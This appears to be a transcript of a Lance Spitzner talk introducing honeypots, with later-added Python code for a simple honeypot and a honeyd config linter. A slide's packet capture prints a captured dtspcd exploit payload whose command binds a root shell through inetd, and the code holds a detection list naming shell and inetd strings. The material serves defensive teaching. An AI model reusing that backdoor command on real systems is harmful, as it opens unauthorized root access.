Honeypots
Presentation transcript (uploaded by unnikrishna, added March 28, 2010)

Your Speaker
Lance Spitzner
- Senior Security Architect, Sun Microsystems
- Founder of the Honeynet Project
- Author of Honeypots: Tracking Hackers
- Co-author of Know Your Enemy
- Moderator of the <honeypots@securityfocus.com> mailing list
- Former 'tread head'

Purpose
To introduce you to honeypots: what they are, how they work, and their value.

Problem
There is a variety of misconceptions about honeypots; everyone has their own definition. This confusion has caused a lack of understanding and of adoption.

Honeypot Timeline
1990/1991 - The Cuckoo's Egg and Evening with Berferd
1997 - Deception Toolkit
1998 - CyberCop Sting
1998 - NetFacade (and Snort)
1998 - BackOfficer Friendly
1999 - Formation of the Honeynet Project
2001 - Worms captured
2002 - dtspcd exploit capture

Definition
Any security resource whose value lies in being probed, attacked, or compromised.

How honeypots work
Simple concept: a resource that expects no data, so any traffic to or from it is most likely unauthorized activity.

Not limited to a specific purpose
Honeypots do not solve a specific problem; instead, they are a tool that contributes to your overall security architecture.
Their value, and the problems they help solve, depend on how you build, deploy, and use them.

Types
- Production (Law Enforcement)
- Research (Counter-Intelligence)
Marty's idea

Value
What is the value of honeypots? This is one of the greatest areas of confusion concerning honeypot technologies.

Advantages
Based on how honeypots conceptually work, they have several advantages:
- Reduce false positives and false negatives
- Data value
- Resources
- Simplicity

Disadvantages
Based on the concept of honeypots, they also have disadvantages:
- Narrow field of view
- Fingerprinting
- Risk

Production
- Prevention
- Detection
- Response

Prevention
Keeping the burglar out of your house. Honeypots, in general, are not effective prevention mechanisms. Deception, deterrence, and decoys are psychological weapons. They do NOT work against automated attacks:
- worms
- auto-rooters
- mass-rooters

Detection
Detecting the burglar when he breaks in. Honeypots excel at this capability, due to their advantages.

Response
Honeypots can be used to help respond to an incident. They can easily be pulled offline (unlike production systems), with little to no data pollution.

Research Honeypots
- Early warning and prediction
- Discover new tools and tactics
- Understand motives, behavior, and organization
- Develop analysis and forensic skills

Early Warning and Prediction

Tools
Packet capture shown on the slide:

    01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112
    TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF
    ***AP*** Seq: 0xFEE2C115  Ack: 0x5F66192F  Win: 0x3EBC  TcpLen: 32
    TCP Options (3) => NOP NOP TS: 463986683 4158792
    30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30  0000000204103e00
    30 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11  01  4 ...10...@.
    80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11  ..@.......@...@.
    80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11  ..@...@...@...@.
    D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC  .#...#...#...#..
    82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68  .. ... ./bin/ksh
    20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E      -c  echo "in
    67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20  greslock stream 
    74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20  tcp nowait root 
    2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F  /bin/sh sh -i">/
    74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F  tmp/x;/usr/sbin/
    69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B  inetd -s /tmp/x;
    73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D  sleep 10;/bin/rm
    20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41   -f /tmp/x AAAAA
    41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

Tactics

Motives and Behavior
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
J1LL: it was illegal last I checked.
J4ck: heh, then everything you do is illegal. Why not make money off of it?
J4ck: I know plenty of people that'd pay exorbitant amounts for packeting.

Level of Interaction
The level of interaction determines the amount of functionality a honeypot provides. The greater the interaction, the more you can learn. The greater the interaction, the more complexity and risk.

Risk
The chance that an attacker can use your honeypot to harm, attack, or infiltrate other systems or organizations.

Low Interaction
- Provide emulated services
- No operating system for the attacker to access
- Information limited to transactional information and the attacker's activities with the emulated services

High Interaction
- Provide actual operating systems
- Learn extensive amounts of information
- Extensive risk
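A minimal low-interaction honeypot in the sense of the slides above, added here as an illustration (it is not code from the talk or from any of the tools it names): it sends a fake banner, records only transactional data about the connection, and never executes or interprets anything it receives. The banners and the marker strings are constructed assumptions; the markers simply tag records whose payload contains strings seen in the capture above.

```python
import socket
import threading
import time

# Constructed sample banners: a low-interaction honeypot only imitates a service.
BANNERS = {22: b"SSH-1.99-OpenSSH_3.4p1\r\n", 25: b"220 mail.example.test ESMTP\r\n"}
# Strings that appear in the dtspcd capture above; used only to tag a record.
MARKERS = (b"/bin/sh", b"/bin/ksh", b"inetd", b"nowait")

def make_record(peer, dst_port, payload):
    """Transactional record: who connected, to what, and what they sent."""
    return {"ts": time.time(), "src_ip": peer[0], "src_port": peer[1],
            "dst_port": dst_port, "bytes": len(payload),
            "head_hex": payload[:32].hex(),
            "markers": [m.decode() for m in MARKERS if m in payload]}

def start_listener(port=0):
    """Bind a listening socket; port 0 lets the OS pick a free one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv, srv.getsockname()[1]

def accept_one(srv, emulate_port, timeout=5.0):
    """Serve one connection: banner out, bytes in, record, hang up. Nothing is run."""
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    with conn:
        conn.settimeout(timeout)
        conn.sendall(BANNERS.get(emulate_port, b""))
        try:
            data = conn.recv(4096)
        except (socket.timeout, ConnectionResetError):
            data = b""
    return make_record(peer, emulate_port, data)

def probe_self(payload, emulate_port=22):
    """Loopback self-test: a client thread sends payload to our own listener."""
    srv, port = start_listener()
    def client():
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)       # done sending; wait for server close
            while c.recv(1024):
                pass
    threading.Thread(target=client, daemon=True).start()
    try:
        return accept_one(srv, emulate_port)
    finally:
        srv.close()
```

Because the listener expects no legitimate traffic, every record it produces is worth a look, which is the detection property the slides describe.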
Honeypots
Low interaction to high interaction:
- BackOfficer Friendly - http://www.nfr.com/products/bof/
- SPECTER - http://www.specter.com
- Honeyd - http://www.citi.umich.edu/u/provos/honeyd/
- ManTrap - http://www.recourse.com
- Honeynets - http://project.honeynet.org/papers/honeynet/

BackOfficer Friendly

Specter

Honeyd
Example honeyd configuration from the slide:

    create default
    set default personality "FreeBSD 2.2.1-STABLE"
    set default default action open
    add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
    add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"
    add default tcp port 113 reset
    add default tcp port 1 reset

    create windows
    set windows personality "Windows NT 4.0 Server SP5-SP6"
    set windows default action reset
    add windows tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
    add windows tcp port 25 block
    add windows tcp port 23 proxy real-server.tracking-hackers.com:23
    add windows tcp port 22 proxy $ipsrc:22
    set template uptime 3284460
    bind 192.168.1.200 windows

ManTrap

Honeynets

Which is best?
None; they all have their advantages and disadvantages. It depends on what you are attempting to achieve.

Legal Issues
- Privacy
- Entrapment
- Liability

Legal Contact for .mil / .gov
Department of Justice, Computer Crime and Intellectual Property Section
General Number: (202) 514-1026
Specific Contact: Richard Salgado
Direct Telephone: (202) 353-7848
E-Mail: richard.salgado@usdoj.gov

Summary
Honeypots are a highly flexible security tool that can be used in a variety of different deployments.

Resources
Honeypots: Tracking Hackers - http://www.tracking-hackers.com
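A small linter for honeyd templates like the one shown under Honeyd above, added here as an illustration (it is not part of honeyd or of the talk). It parses the template and flags the two settings that bear on the Risk and Fingerprinting slides: a default action of open, which answers on every unlisted port, and proxy entries, which relay a connection onward. The embedded SAMPLE is a constructed excerpt of the slide's configuration.

```python
# Excerpt of the honeyd template from the slide, embedded as constructed input.
SAMPLE = """\
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default action open
add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"
add default tcp port 113 reset
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
set windows default action reset
add windows tcp port 25 block
add windows tcp port 23 proxy real-server.tracking-hackers.com:23
add windows tcp port 22 proxy $ipsrc:22
bind 192.168.1.200 windows
"""

def parse_honeyd(text):
    """Collect personality, default action and per-port actions per template."""
    templates, binds = {}, {}
    for line in text.splitlines():
        p = line.split()
        if not p or p[0].startswith("#"):
            continue
        if p[0] == "create":
            templates[p[1]] = {"personality": None, "default": None, "ports": {}}
        elif p[0] == "set" and p[2] == "personality":
            templates[p[1]]["personality"] = line.split('"')[1]
        elif p[0] == "set" and p[2:4] == ["default", "action"]:
            templates[p[1]]["default"] = p[4]
        elif p[0] == "add" and p[3] == "port":
            templates[p[1]]["ports"][(p[2], int(p[4]))] = " ".join(p[5:])
        elif p[0] == "bind":
            binds[p[1]] = p[2]   # other directives (uptime, ...) are ignored
    return templates, binds

def lint(templates):
    """(template, message) pairs for settings that add risk or aid fingerprinting."""
    findings = []
    for name, t in templates.items():
        if t["default"] == "open":
            findings.append((name, "default action 'open': every unlisted port "
                                   "answers, which makes the decoy easy to fingerprint"))
        for (proto, port), action in t["ports"].items():
            if action.startswith("proxy "):
                target = action.split()[1]
                # $ipsrc hands the connection back to its own source; a fixed host
                # means the honeypot relays attacker traffic to a real system.
                sev = "low" if target.startswith("$ipsrc") else "high"
                findings.append((name, f"{proto}/{port} proxied to {target}: risk {sev}"))
    return findings
```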